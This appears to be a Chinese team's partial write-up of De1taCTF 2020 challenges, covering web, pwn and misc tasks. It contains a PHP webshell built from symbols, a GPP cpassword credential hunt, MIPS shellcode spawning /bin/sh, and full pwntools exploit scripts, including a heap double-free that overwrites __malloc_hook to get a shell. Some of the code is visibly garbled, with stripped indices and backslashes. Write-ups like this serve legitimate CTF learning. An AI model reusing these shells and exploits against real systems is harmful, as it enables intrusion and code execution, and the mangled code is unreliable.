De1taCTF2020 部分Writeup

admin 2022年3月1日10:42:31评论53 views字数 32695阅读108分59秒阅读模式

De1taCTF2020 部分Writeup


Timeline Sec CTF组成立了两个月,终于迎来了第二次比赛(被师傅们锤),以下分享的是我们在De1ta2020比赛中针对部分题目的解题思路。

check in:

De1taCTF2020 部分Writeup


De1taCTF2020 部分Writeup


De1taCTF2020 部分Writeup

De1taCTF2020 部分Writeup


<?=$_=[]?><?=$_=@"$_"?><?=$_=$_['!'=='@']?> <?=$___=$_?><?= $__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$___.=$__?><?= $___.=$__?><?= $__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?= $___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?= $___.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?= $___.=$__?><?=$____='_'?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?= $____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?= $____.=$__?><?=$__=$_?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?=$__++?><?= $____.=$__?><?= $_=$$____?><?= $___($_[__]($_[_]))?>


De1taCTF2020 部分Writeup

C:webuploadsc4886f6b02da81f479721e440dc3aa6fDe1CTF2020.lab> findstr /c:"userName=" /c:"cpassword=" /si *.xmlPolicies{B1248E1E-B97D-4C41-8EA4-1F2600F9264B}MachinePreferencesGroupsGroups.xml:<properties action="U" newname="" fullname="" description="" cpassword="uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08" changelogon="1" nochange="0" <="" p=""> neverExpires="0" acctDisabled="0" userName="HintZip_Pass"/>

flag1: De1CTF{GpP_11Is_SoOOO_Ea3333y}

Get flag2 Hint:
hint1: You need De1ta user to get flag2
hint2: De1ta user's password length is 1-8, and the password is composed of [0-9a-f].
hint3: Pay attention to the extended rights of De1ta user on the domain.
hint4: flag2 in Domain Controller (C:UsersAdministratorDesktopflag.txt)

PS: Please do not damage the environment after getting permission, thanks QAQ.


  1. 一直在被引用的博文

  2. 官方文档 :

  3. 文本表达式 : 支持字符串,日期,数字,布尔和 null

  4. 属性值( Properties )使用 . 来访问,数组( Arrays )和列表( Lists )使用 [] 来获取元素,字典( maps )使用 [] 和 key 访问 value

  5. 列表( Lists )可以在表达式中直接使用 {} 表达

  6. 数组可以在表达式中直接使用 Java 语法构建,但是多维数组不能手动初始化

  7. Java 函数可以直接在表达式中使用

  8. 可以使用关系运算,逻辑运算和数学运算

  9. 赋值可以通过赋值运算符来完成,也可以在 setValue 函数中完成,也可以在 getValue 的调用中完成

  10. T(Type) 可以指定 java.lang.class 的实例,但是对于其他实例,要完全限定

  11. 可以使用 new 调用构造函数,但是除了基元类型和字符串(其中可以使用int、float等)之外,所有的类都应该使用完全限定的类名

  12. 变量可以使用 #变量名 来进行引用,这些变量是在 StandardEvaluationContext 中使用 setVariable 赋值的

  13. 使用 #root 引用根对象,使用 #this 引用当前上下文对象。

  14. 通过使用 StandardEvaluationContext 中的 registerFunction(String name, Method m) 函数来自定义函数

  15. 如果已使用 Bean 解析器配置了上下文,可以使用 @ 获取 Bean

  16. 表达式允许多个文本和解析块混合使用,常以 #{} 作为分界符


然后就是实例化的问题了,由于过滤了比较关键的T()就尝试 new,发现 new 也被过滤了,但是可以使用 new 绕过

最终 payload

flag : De1CTF{NobodyKnowsMoreThanTrumpAboutJava}

之后得到一个base64编码的字符串,复制到本地解码之后发现是一个gz文件,再次解压缩就给了一个二进制文件,使用flie 命令发现这是个MIPS文件
# file real_code
real_code: ELF 32-bit LSB executable, MIPS, MIPS-II version 1 (SYSV), dynamically linked, interpreter /lib/, for GNU/Linux 3.2.0, BuildID[sha1]=054a53e5fce96f662a15137fe88cdfbffbbbb9c8, stripped

arm_now start mips32el --sync --redir tcp:1337:1337。其中,--sync指将当前目录复制并加载到虚拟环境中,--redir tcp:1337:1337指将端口转发到本机,便于之后的gdb调试。
undefined4 main(void){ int iVar1; undefined8 uVar2; ulonglong uVar3; timeval tStack292; timeval tStack284; undefined auStack276 [256]; int iStack20; iStack20 = __stack_chk_guard; gettimeofday(&tStack292,(__timezone_ptr_t)0x0); memset(auStack276,0,0x100); FUN_00401dc0(); iVar1 = FUN_00401e88(); if (iVar1 != 0) { gettimeofday(&tStack284,(__timezone_ptr_t)0x0); tStack292.tv_usec = ((tStack284.tv_sec - tStack292.tv_sec) * 1000000 + tStack284.tv_usec) - tStack292.tv_usec; __divdi3(tStack292.tv_usec,0,1000000,0); uVar2 = __moddi3(tStack292.tv_usec,0,1000000,0); printf("======== %lld.%llds ========n"); FUN_00401f64(tStack292.tv_usec,0); puts("Your time comes.n> "); uVar3 = __divdi3(tStack292.tv_usec,0,100000,0,(int)((ulonglong)uVar2 >> 0x20),(int)uVar2); if (((int)uVar3 == 0) && (uVar3 < 0xd00000000)) { read(0,auStack276,(int)(uVar3 >> 0x20) * -4 + 0x34); } (*(code *)auStack276)();} if (iStack20 == __stack_chk_guard) { return 0;} __stack_chk_fail();}


  1. iVar1 = FUN_00401e88();我们需要使得iVar1不为0,才有机会进入到下面的内容

  2. (*(code *)auStack276)();程序试图直接执行栈上内容

  3. ((int)uVar3 == 0) && (uVar3 < 0xd00000000)条件达成时,程序直接读取shellcode,并执行

p = angr.Project("real_code")state = p.factory.blank_state(addr=0x401e88)sm = p.factory.simgr(state)sm.explore(find=0x400b30)# 0x400b30为最内层return非零值的汇编指令print(sm.found[0].posix.dumps(0))

./real_code < solution去看看有没有成功。如果程序打印出"======== %lld.%llds ========n"就代表至少这个输入通过了验证函数。
short FUN_004017b4(param_1){ short uVar1; if (((((param_1[2] ^ param_1[3]) == 0x4d) && (param_1[3] == 0xce)) && ((uint)param_1[0] == ((uint)(param_1[2] ^ param_1[3]) & 0x7f) << 1)) && (param_1[1] == (byte)(param_1[2] ^ param_1[3] ^ param_1[0]))) { uVar1 = FUN_0040166c(param_1 + 4);} else { uVar1 = 0;} return uVar1;}
short FUN_004018c0(param_1){ short uVar1; if (((((param_1[0] ^ param_1[1]) == 0x4e) && (param_1[1] == 0x1b)) && ((uint)param_1[2] == ((uint)(param_1[0] ^ param_1[1]) & 0x7f) << 1)) && (param_1[3] == (byte)(param_1[0] ^ param_1[1] ^ param_1[2]))) { uVar1 = FUN_004017b4(param_1 + 4);} else { uVar1 = 0;} return uVar1;}


def case1(p, verbose=False):# p: list of ints# e.g. for FUN_004018c0# p = [0, 1, 0x4e, 1, 0x1b, 2, 0, 1, 0x7f, 3, 0, 1, 2] s = Solver() a = BitVec('a', 32) A = [a & 0xff, (a >> 8) & 0xff, (a >> 16) & 0xff, (a >> 24) & 0xff] s.add(A

] ^ A

] == p[2]) s.add(A

] == p[4]) s.add(A

] == ((A

] ^ A

]) & p[8]) << 1) s.add(A

] == A

] ^ A

] ^ A

if verbose: print(s) if s.check() == sat: m = s.model() return m[a].as_long() else: print("1unsat :(") exit()


uVar3 = __divdi3(tStack292.tv_usec,0,100000,0,uVar2 >> 0x20,uVar2); if (((int)uVar3 == 0) && (uVar3 < 0xd00000000)) { read(0,auStack276,(int)(uVar3 >> 0x20) * -4 + 0x34); } (*(code *)auStack276)();

execve("/bin/sh", 0, 0)是不可取的,而是需要execve("/bin/sh", ["/bin/sh", 0], 0)。在本地测试时,由于解是提前求好的并且没有网络延迟,程序基本上可以读取理论最大值的长度。但在远程,较长的shellcode不能保证完全被读取,所以我们需要使用ROP的技巧修改read的长度并且再一次返回到read,读取一段长shellcode,并且执行这段shellcode。最终shellcode如下。
第一段:"x00x01x06x24" li a2, 256"xdcxffxffx27" addiu ra, ra, -36"x08x00xe0x03" jr ra"x00x00x00x00" * 10    nop * 10 这里是padding第二段:"xffxffx06x28" slti a2, zero, -1"xffxffxd0x04" bltzal a2, 0x7fda0380"xe0xffxbdx27" addiu sp, sp, -32"x18x00xe4x27" addiu a0, ra, 24"xe8xffxa4xaf" sw a0, -24(sp)"xecxffxa0xaf" sw zero, -20(sp)"xe8xffxa5x23" addi a1, sp, -24"xabx0fx02x24" li v0, 4011"x0cx01x01x01" syscall 0x40404"/bin/sh"

只要程序读取前三行(12字节)的shellcode,便会将a2寄存器设置成256,并且跳转到ra-36的位置。ra寄存器储存的值是pc(program counter),由于MIPS的指令长度都是4,那ra-36也就是9个指令之前,也就正好是调用read函数的地方。MIPS中传参使用的寄存器是a0-a3,而在这个例子中,我们需要的寄存器值都没有发生改变,也就是说在
read(0,auStack276,(int)(uVar3 >> 0x20) * -4 + 0x34);中我们只需要改变a2的值为256就可以达到`read(0,auStack276,256);的效果。
MIPS中的x00x00x00x00代表的就是nop。这里我们假设第一段shellcode的内容没有完全被读完(由于时间限制),而是只读取了前3行指令和n个 nop,那此时stdin中剩下的内容就是(10 - n)个nop以及真正生成shellcode的指令。在第二次读取时,程序就会执行(10 - n)个nop,再执行完整的shellcode,至此,shell被生成。
#!/usr/bin/env python
from z3 import *

def abs(x): return If(x >= 0, x, -x)

def case1(p, verbose=False): s = Solver() a = BitVec('a', 32) A = [a & 0xff, (a >> 8) & 0xff, (a >> 16) & 0xff, (a >> 24) & 0xff] s.add(A

] ^ A

] == p[2]) s.add(A

] == p[4]) s.add(A

] == ((A

] ^ A

]) & p[8]) << 1) s.add(A

] == A

] ^ A

] ^ A

if verbose: print(s) if s.check() == sat: m = s.model() return m[a].as_long() else: print("1unsat :(") exit()

def case2(p, verbose=False): s = Solver() a = BitVec('a', 32) A = [a & 0xff, (a >> 8) & 0xff, (a >> 16) & 0xff, (a >> 24) & 0xff] s.add(A

] + A

] + A

] == p[3]) s.add(A

] + A

] + A

] == p[7]) s.add(A

] + A

] + A

] == p[11]) s.add(A

] + A

] + A

] == p[15])
if verbose: print(s) if s.check() == sat: m = s.model() return m[a].as_long() else: print p print("2unsat :(") exit()

def case3(p, verbose=False): s = Solver() a = BitVec('a', 32) A = [a & 0xff, (a >> 8) & 0xff, (a >> 16) & 0xff, (a >> 24) & 0xff] s.add(A

] == p[1]) s.add(A

] == p[3]) s.add(A

] == (A

] * A

]) & 0xff) s.add(A

] == (A

] * A

] + A

] * A

] - A

] * A

]) & 0xff)
if verbose: print(s) if s.check() == sat: m = s.model() return m[a].as_long() else: print p print("3unsat :(") exit()

def case4(p, verbose=False): s = Solver() a = BitVec('a', 32) A = [a & 0xff, (a >> 8) & 0xff, (a >> 16) & 0xff, (a >> 24) & 0xff] s.add(A

] + A

] != p[2]) s.add(A

] + A

] != p[5]) s.add(A

] + A

] != p[8])
if verbose: print(s) if s.check() == sat: m = s.model() return m[a].as_long() else: print p print("4unsat :(") exit()
# vals: first 4 values in [], in the order they are encouter in the code

def case5(p, verbose=False): s = Solver() a = BitVec('a', 32) A = [a & 0xff, (a >> 8) & 0xff, (a >> 16) & 0xff, (a >> 24) & 0xff] # print p v1 = A

] * A

] - A

] * A

] v2 = A

] * A

] - A

] * A

] v1b = A

] * A

] - A

] * A

] v2b = A

] * A

] - A

] * A

if p[8] == 1: # v2 <= v1 s.add(abs(v1) >= abs(v2)) else: # v2 > v1 s.add(abs(v2) > abs(v1))
if p[9] == 1: s.add(abs(v1b) >= abs(v2b)) else: s.add(abs(v2b) > abs(v1b))
if verbose: print(s) if s.check() == sat: m = s.model() ''' if p[9] == 0 and p[8] == 0: print "---" print (m[a].as_long() & 255)*(m[a].as_long() & 255) - (m[a].as_long() >> 24 & 255)*(m[a].as_long() >> 24 & 255) print (m[a].as_long() >> 8 & 255)*(m[a].as_long() >> 8 & 255) - (m[a].as_long() >> 16 & 255)*(m[a].as_long() >> 16 & 255) print "---" print "---" print hex(m[a].as_long()) ''' return m[a].as_long() else: print("unsat :(") exit()

def case6(p, verbose=False): s = Solver() a = BitVec('a', 32) A = [a & 0xff, (a >> 8) & 0xff, (a >> 16) & 0xff, (a >> 24) & 0xff] s.add(A

] == A

]) s.add(A

] == A

]) s.add(A

] == p[5]) s.add(A

] == p[7])
if verbose: print(s) if s.check() == sat: m = s.model() return m[a].as_long() else: print("6unsat :(") exit()内容过长,附在文章末尾,师傅们有需自取
import hashlibfrom pwn import *import osfrom rev import generatePayloadimport timeimport codesha = open("sha", "rb").read().split("n")dict_sha = {}print "loading"for x in range(len(sha)):    dict_sha[sha[x]] = xprint "loaded dict"# Used a saved dict of sha256# as I thought this would reduce some time taken# but this is not the key to solve the chall# just a waste of space but saves time to bruteforceshellcode = "x00x01x06x24xdcxffxffx27x08x00xe0x03x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xffxffx06x28xffxffxd0x04xe0xffxbdx27x18x00xe4x27xe8xffxa4xafxecxffxa0xafxe8xffxa5x23xabx0fx02x24x0cx01x01x01/bin/sh"def exp():    b6gz = open("b6gz", "wb")    r = remote("", 9999, level="debug")    r.recvuntil("=========Pow========n")    hash_value = r.recvuntil(""n", drop=True).split("== "")[1]    length = int(r.recvuntil("n", drop=True).split("== ")[1])    guess_all = list(chr(x) for x in range(0x0, 0x100))    guess = p32(dict_sha[hash_value], endian="big")[1:]    r.sendline(guess)    r.recvuntil("Binary Dump:n===============n")    dumps = r.recvuntil("n==", drop=True)    b6gz.write(dumps)    b6gz.close()    os.system("base64 -d b6gz > b6.gz")    os.system("gzip -cd b6.gz > real_code")    payload = generatePayload("real_code")    name = "shellx00x00x00"    r.recvuntil("> ")    r.send(payload)    r.recvuntil("> ")    r.send(name)    r.recvuntil("> ")    r.send(shellcode)    r.interactive()    r.close()# enter exp() manually# as the dict file is loaded into memory# I don't want to reload every time# and sometimes generatePayload() does not work properly# if it throws an exption, ignore it and exp() againcode.interact(local=locals())

De1taCTF2020 部分Writeup



vector存在double free,先申请出8个chunk,全部free掉,把tcache填满,然后再free一次vector中的chunk0,就能将main_arena链如unsorted bin中,就能leak libc_base了

De1taCTF2020 部分Writeup


再次double free,紧接着vector申请一个chunk,里面放malloc_hook-0x16,然后调试看,大概会像这样

De1taCTF2020 部分Writeup

#!/usr/bin/env python#coding=utf-8from pwn import*import sys#context.log_level = 'debug'context.terminal = ['terminator','-x','sh','-c']binary = './stl_container' local = 0if local == 1: p=process(binary)else: p=remote("",8848)elf=ELF(binary)libc=ELF("")def Ladd(content): p.recvuntil(">> ") p.send("1") p.recvuntil(">> ") p.send("1") p.recvuntil("data:") p.send(content)def vadd(content): p.recvuntil(">> ") p.send("2") p.recvuntil(">> ") p.send("1") p.recvuntil("data:") p.send(content)def qadd(content): p.recvuntil(">> ") p.send("3") p.recvuntil(">> ") p.send("1") p.recvuntil("data:") p.send(content)def sadd(content): p.recvuntil(">> ") p.send("4") p.recvuntil(">> ") p.send("1") p.recvuntil("data:") p.send(content)def Lfree(index): p.recvuntil(">> ") p.send("1") p.recvuntil(">> ") p.send("2") p.recvuntil("index?") p.send(str(index))def vfree(index): p.recvuntil(">> ") p.send("2") p.recvuntil(">> ") p.send("2") p.recvuntil("index?") p.send(str(index))def qfree(): p.recvuntil(">> ") p.send("3") p.recvuntil(">> ") p.send("2")def sfree(): p.recvuntil(">> ") p.send("4") p.recvuntil(">> ") p.send("2")def Lshow(index): p.recvuntil(">> ") p.send("1") p.recvuntil(">> ") p.send("3") p.recvuntil("index?") p.send(str(index))def vshow(index): p.recvuntil(">> ") p.send("2") p.recvuntil(">> ") p.send("3") p.recvuntil("index?") p.send(str(index))def qshow(index): p.recvuntil(">> ") p.send("3") p.recvuntil(">> ") p.send("3") p.recvuntil("index?") p.send(str(index))def sshow(index): p.recvuntil(">> ") p.send("4") p.recvuntil(">> ") p.send("3") p.recvuntil("index?") p.send(str(index))def exp(): Ladd(" ") # 0 Ladd(" ") # 1 vadd(" ") # 2 vadd(" ") # 3 qadd(" ") # 4 qadd(" ") # 5 sadd(" ") # 6 sadd(" ") # 7 Lfree(0) Lfree(1) vfree(0) vfree(1) qfree() qfree() sfree() sfree() vfree(0) qadd(" ") qadd(" ") sadd(" ") sadd(" ") vadd(" ") vshow(0) leak = u64(p.recvuntil('x7f')[-6:].ljust(8, 'x00')) libc_base = leak - 0x3ebc20 malloc_hook = libc_base + libc.sym['__malloc_hook'] realloc = libc_base + libc.sym['realloc'] log.success("libc_base==>" + hex(libc_base)) log.success("malloc_hook==>" + hex(malloc_hook)) one_gadget = libc_base + 0x4f322 print "one==>" + hex(one_gadget) payload = p64(malloc_hook) qfree() qfree() sfree() sfree()

vadd(" ") vfree(0) vfree(0) vadd(p64(malloc_hook-0x16)) payload = "a" *0x16 + p64(one_gadget) vadd(payload) #gdb.attach(p) p.recvuntil(">> ")p.send("1")p.recvuntil(">> ")p.send("1") p.sendline("cat flag") p.interactive()exp()




Misc杂烩/Misc Chowder

De1taCTF2020 部分Writeup


De1taCTF2020 部分Writeup


De1taCTF2020 部分Writeup


Hurry up and join in the game.
We’re waiting for you.
mc_joinin's flag is: De1CTF{md5(flag)}

在题目环境 Web 页面获取到信息如下:

Minecraft 20.20 is developed by De1ta Team based on 1.12
Headless: Client isn't necessary.

首先尝试通过 HMCL 启动器安装 Java 1.12 版本的游戏资源,尝试离线模式加入多人游戏。

De1taCTF2020 部分Writeup


De1taCTF2020 部分Writeup

在 Github 上检索 Minecraft client 找到仓库 [pyCraft](

De1taCTF2020 部分Writeup
运行 尝试连接服务器时提示:
VersionMismatch: Server's protocol version of 997 (MC2020) is not supported.
在 ./minecraft/ 中 229 行添加:'MC2020':  997, 再次尝试:

De1taCTF2020 部分Writeup

成功连接到服务器, Wireshark 捕获流量进行分析:

De1taCTF2020 部分Writeup

HIDE FLAG ONE,进而获取到图片:

De1taCTF2020 部分Writeup

StegSolve 检查时在 Red plane 1 通道获取到隐写信息:

De1taCTF2020 部分Writeup

对图片进行旋转反向变换后获取到 De1CTF{MC2020_Pr0to3l_Is_Funny-ISn't_It?}

De1taCTF2020 部分Writeup

最终 flag:

No Game No Life!
De1taCTF2020 部分Writeup

binwalk 检查 game.jpg 发现有附件文件,`-e` 进行分离:
获取到加密压缩包 (内含 txt.pilf.txt)及 passphare.png,需要从 png 中获取 key 解压,passphare.png(27 * 27) 如下:

De1taCTF2020 部分Writeup

尝试作为 QR 、DataMatrix 进行修复识别无果,后通过 Google 搜索 "CTF" "life" "game" 时发现该图很可能出自 [Conway's Game of Life](一款模拟细胞演变状态的细胞自动机)。

参考 [Sunshine CTF 2019 Golly Gee Willikers]( , 首先将 passphare.png 转换为 01 矩阵如下:

再通过如下脚本转换为 [Extended RLE Format](
lines = open("1.txt", "r").read().split("n")content = ""header = "x = 27, y = 27, rule = B3/S23n"

for line in lines: line = line.replace("1", "o") line = line.replace("0", "b") idx = 0 currState = "u" currNum = 0 while idx < 28: # flush the last one if idx == 27: if currNum > 1: content += str(currNum) + currState content += "$" else: content += line[26] content += "$" break # init state if currState == "u": currState = line[idx] currNum = 1 # already inited # and same state of cell elif currState == line[idx]: currNum += 1 elif currState != line[idx]: # print("flush now") result = str(currNum) + currState if currNum != 1 else currState content += result currState = line[idx] currNum = 1 # print(line[idx], str(currNum) + currState, content) idx += 1

print(header + content)

在  导入 Extend RLE Format state 如下:
x = 27, y = 27, rule = B3/S2313bo13b$27b$2bo10bo13b$5bobo2bobo4bo2bob2o3b$3b2obob2o2bob4ob2o2bo3b$3bobobobobo5bob2obo4b$bobo5bo5b2o7bo2b$3b2obob2ob2o2bobobo2bo4b$3bobobobobob2o2b2ob2o2bo2b$4bobobo4bo3bo2b2obo3b$3bo5bob2o2b2o7b3o$7b4o3bob2o2b2ob2obo$2bobo2bo6bo3b2o5bob$5b3o2bob2o3bo2b2obob2o$2bobo2b2ob2o3bo6bo2b2o$3bob4o3b2obo2b4o3bob$5b2o6b2o2bobobobob2o$4bo2b2o2b3o2bobobob2ob2o$2b2o4b2o2bobo4bo3bo2bo$6bo2bobo3bob2o6b2o$3o2b2o2bo2b2o3bo2b4ob2o$b3o2bo3bob3obo3bobo2bob$o7bo3bo4b2obo2bob2o$o2bo6bo2bo4b2o4b2ob$obob4obo2b7o2b2o2bob$o3b7ob2ob2o2b7ob$2bo2bo4b4o2b3obobo2b2o$

观察下一个 Step发现 QR Code,获取到 key: AJTC8ADEVRA13AR.

De1taCTF2020 部分Writeup

进而解压分离出的zip,获取到 txt.pilf.txt , 对其内容先进行 flip 反转后 Base64 解码,再得到的结果反转后 Base16 解码获取到最终 flag:De1CTF{l3t_us_s7art_th3_g4m3!}.

Timeline Sec CTF组长期招收Re、Crypto和智能合约方向的CTFer,为啥长期招收这两个方向,不如看看这次wp分享少了哪两个方向的题解(手动狗头),欢迎感兴趣的师傅私聊我们的公众号!


from elftools.elf.elffile import ELFFilefrom capstone import *import code as cdfrom bar import *from pwn import p32def generatePayload(path):    with open(path, 'rb') as f:    # with open('ver/bin', 'rb') as f:    # with open('ver/code3', 'rb') as f:        elf = ELFFile(f)        code = elf.get_section_by_name('.text')        ops =        addr = code['sh_addr']        md = Cs(CS_ARCH_MIPS, CS_MODE_32 + CS_MODE_LITTLE_ENDIAN)        n = 0        check_functions = []        instructions = {}        for i in md.disasm(ops, addr):            instructions[i.address] = [i.mnemonic, i.op_str]            if "jal" in i.mnemonic:                n += 1                if n > 5 and n < 22:                    # print "{}:t{}t{}".format(hex(i.address), i.mnemonic, i.op_str)                    check_functions.append(int(i.op_str, 16))        check_functions.sort()        # print list(hex(term) for term in check_functions)        type1 = {}        type2 = {}        type3 = {}        type4 = {}        type5 = {}        type6 = {}        for func_addr in check_functions:            # type 1            if instructions[func_addr + 0xe0][0] == u"jal" or instructions[func_addr + 0xe0 - 8][0] == u"jal" or instructions[func_addr + 0xe0 + 4][0] == u"jal" or instructions[func_addr + 0xdc][0] == u"jal":                para_offset = func_addr + 0x18                parameters = []                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0xc                else:                    parameters.append(u"0")                    para_offset += 0x8                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0x10                else:                    parameters.append(u"0")                    para_offset += 0xc                # constant                curr_ins = instructions[para_offset]                parameters.append(unicode(int(curr_ins[1].split(", ")[-1], 16)))                para_offset += 0x10                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0x8                else:                    parameters.append(u"0")                    para_offset += 0x4                # constant                curr_ins = instructions[para_offset]                if curr_ins[0] == 'addiu':                    parameters.append(unicode(int(curr_ins[1].split(", ")[-1], 16)))                    para_offset += 0x10                else:                    parameters.append(unicode(0))                    para_offset += 0xc                # for the following, this is to test                # many circumstances have not been considered                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0xc                else:                    parameters.append(u"0")                    para_offset += 0x8                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0xc                else:                    parameters.append(u"0")                    para_offset += 0x8                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0xc                else:                    parameters.append(u"0")                    para_offset += 0x8                # constant                curr_ins = instructions[para_offset]                # parameters.append(unicode(int(curr_ins[1].split(", ")[-1], 16)))                parameters.append(unicode(0x7f))                para_offset += 0x18                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0xc                else:                    parameters.append(u"0")                    para_offset += 0x8                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0xc                else:                    parameters.append(u"0")                    para_offset += 0x8                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0x14                else:                    parameters.append(u"0")                    para_offset += 0x10                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                else:                    parameters.append(u"0")                type1[func_addr] = parameters                pass            # type 2            elif instructions[func_addr + 0x104][0] == u"jal":                para_offset = func_addr + 0x18                parameters = []                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    initial = curr_ins[1].split(", ")[-1]                    parameters.append(initial)                    parameters.append(unicode((int(initial) + 1) % 4))                    parameters.append(unicode((int(initial) + 2) % 4))                else:                    initial = u"0"                    parameters.append(initial)                    parameters.append(unicode((int(initial) + 1) % 4))                    parameters.append(unicode((int(initial) + 2) % 4))                if initial != u"1":                    para_offset += 0x28                    curr_ins = instructions[para_offset]                    parameters.append(unicode(int(curr_ins[1].split(", ")[-1], 16)))                    para_offset += 0x10                else:                    para_offset += 0x2c                    curr_ins = instructions[para_offset]                    parameters.append(unicode(int(curr_ins[1].split(", ")[-1], 16)))                    para_offset += 0x10                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    initial = curr_ins[1].split(", ")[-1]                    parameters.append(initial)                    parameters.append(unicode((int(initial) + 1) % 4))                    parameters.append(unicode((int(initial) + 2) % 4))                else:                    initial = u"0"                    parameters.append(initial)                    parameters.append(unicode((int(initial) + 1) % 4))                    parameters.append(unicode((int(initial) + 2) % 4))                if initial != u"1":                    para_offset += 0x28                    curr_ins = instructions[para_offset]                    parameters.append(unicode(int(curr_ins[1].split(", ")[-1], 16)))                    para_offset += 0x10                else:                    para_offset += 0x2c                    curr_ins = instructions[para_offset]                    parameters.append(unicode(int(curr_ins[1].split(", ")[-1], 16)))                    para_offset += 0x10                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    initial = curr_ins[1].split(", ")[-1]                    parameters.append(initial)                    parameters.append(unicode((int(initial) + 1) % 4))                    parameters.append(unicode((int(initial) + 2) % 4))                else:                    initial = u"0"                    parameters.append(initial)                    parameters.append(unicode((int(initial) + 1) % 4))                    parameters.append(unicode((int(initial) + 2) % 4))                if initial != u"1":                    para_offset += 0x28                    curr_ins = instructions[para_offset]                    parameters.append(unicode(int(curr_ins[1].split(", ")[-1], 16)))                    para_offset += 0x10                else:                    para_offset += 0x2c                    curr_ins = instructions[para_offset]                    parameters.append(unicode(int(curr_ins[1].split(", ")[-1], 16)))                    para_offset += 0x10                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    initial = curr_ins[1].split(", ")[-1]                    parameters.append(initial)                    parameters.append(unicode((int(initial) + 1) % 4))                    parameters.append(unicode((int(initial) + 2) % 4))                else:                    initial = u"0"                    parameters.append(initial)                    parameters.append(unicode((int(initial) + 1) % 4))                    parameters.append(unicode((int(initial) + 2) % 4))                if initial != u"1":                    para_offset += 0x28                    curr_ins = instructions[para_offset]                    parameters.append(unicode(int(curr_ins[1].split(", ")[-1], 16)))                    para_offset += 0x10                else:                    para_offset += 0x2c                    curr_ins = instructions[para_offset]                    parameters.append(unicode(int(curr_ins[1].split(", ")[-1], 16)))                    para_offset += 0x10                type2[func_addr] = parameters                pass            # type 3            elif instructions[func_addr + 0x10c][0] == u"jal" or instructions[func_addr + 0x114][0] == u"jal" or instructions[func_addr + 0x11c][0] == u"jal":                para_offset = func_addr + 0x18                parameters = []                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0x8                else:                    parameters.append(u"0")                    para_offset += 0x4                # constant                curr_ins = instructions[para_offset]                parameters.append(unicode(int(curr_ins[1].split(", ")[-1], 16)))                para_offset += 0x10                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0x8                else:                    parameters.append(u"0")                    para_offset += 0x4                # constant                curr_ins = instructions[para_offset]                parameters.append(unicode(int(curr_ins[1].split(", ")[-1], 16)))                para_offset += 0x10                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    para_offset += 0x10                else:                    parameters.append(u"0")                    para_offset += 0xc                curr_ins = instructions[para_offset]                if 'lbu' not in curr_ins[0]:                    parameters.append(curr_ins[1].split(", ")[-1])                    